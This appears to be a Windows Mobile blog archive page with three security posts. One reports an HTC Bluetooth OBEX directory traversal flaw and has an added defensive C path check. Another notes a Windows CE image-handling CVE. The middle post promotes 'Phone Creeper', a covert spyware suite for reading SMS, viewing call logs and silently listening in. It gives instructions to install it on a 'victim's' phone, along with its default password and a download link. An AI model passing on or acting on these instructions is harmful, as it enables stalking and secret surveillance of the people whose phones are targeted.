by Saijo on July 15, 2009
in News
Bluetooth Vulnerability
HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and to read or write arbitrary files, via a ../ in a pathname. HTC handsets running Windows Mobile 5 are not affected. Users worried about the vulnerability should avoid pairing their phones with an untrusted handset or computer. They may also want to delete any devices that are already paired with their phones. Because the driver, obexfile.dll, is an HTC driver, only handsets from the company are affected. According to Moreno Tablado, who discovered this vulnerability, Windows Mobile 6.5 devices will apparently be vulnerable too if HTC does not fix the driver.
[ via PC World ]
More info about the Vulnerability
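A defender-side illustration of the ../ problem described in the post above, added here as an example and not taken from the original post or from HTC's driver: a C check that refuses client-supplied names which would climb out of the shared folder. The function names and the depth-tracking approach are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Added example, hypothetical names: lexical confinement check for a
 * client-supplied OBEX FTP name. Returns the depth below the shared root
 * after applying `name` from a folder at `cwd_depth`, or -1 if the name is
 * absolute, contains ':' (drive or stream), or climbs above the root. */
int share_depth_after(int cwd_depth, const char *name)
{
    int depth = cwd_depth;
    const char *p = name;

    if (name == NULL || cwd_depth < 0)
        return -1;
    /* Absolute paths and anything containing ':' are refused outright. */
    if (*p == '/' || *p == '\\' || strchr(name, ':') != NULL)
        return -1;

    while (*p != '\0') {
        /* Treat '/' and '\' alike: a check that only looks for one of
         * them is incomplete on a Windows file system. */
        size_t len = strcspn(p, "/\\");

        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0)
                return -1;      /* would leave the shared folder */
        } else if (len > 0 && !(len == 1 && p[0] == '.')) {
            depth++;            /* ordinary component descends one level */
        }
        p += len;
        if (*p != '\0')
            p++;                /* skip the separator */
    }
    return depth;
}

/* 1 if the request may be served from the share, 0 if it must be refused. */
int name_is_confined(int cwd_depth, const char *name)
{
    return share_depth_after(cwd_depth, name) >= 0;
}
```

The check is purely lexical; a server should still canonicalize the final path and confirm it lies under the shared root before opening it.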
by Mukku on June 22, 2009
in Uncategorized
Phone Creeper, which the author describes as an Espionage Suite, has recently been released by chetstriker from xda-developers. I am thankful to the developer for pointing out such a vulnerability within the Windows Mobile operating system.
Currently it has the following features:
- secretly and remotely read incoming / outgoing SMS
- secretly and remotely delete incoming / outgoing SMS
- secretly and remotely view call history
- bounce SMS messages off remote phone to someone else
- create a pop-up message on phone
- send a secret fart sound
- secretly and remotely listen to person (initiates silent call back of person to your phone with their speaker phone enabled)
- also send listening in call to somebody else’s phone
All results will be sent via SMS back without leaving any trace on the phone being controlled. Any cell phone can be used to initiate the commands and all commands will respond with a success message for acknowledgment.
Install Instructions:
Just install the .cab on the victim's WM5 or higher phone. THEN MAKE SURE YOU REBOOT TO INITIATE IT.
By default the password is “chetstriker”, obviously not including the quotes, and BE SURE IT’S ALL IN LOWER CASE. The command format is (password and then command)
Download this Application
by Saijo George on May 28, 2008
in News
We don't usually find a lot of security vulnerabilities on mobile devices when compared to their desktop cousins, but once in a while a few of them do surface.
A security vulnerability for Windows CE was posted in the US-CERT Cyber Security Bulletin.
Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted JPEG and GIF images.
For more details see the National Vulnerability Database (CVE-2008-2160).
An update is available from Microsoft here.
Source: 4winmobile.com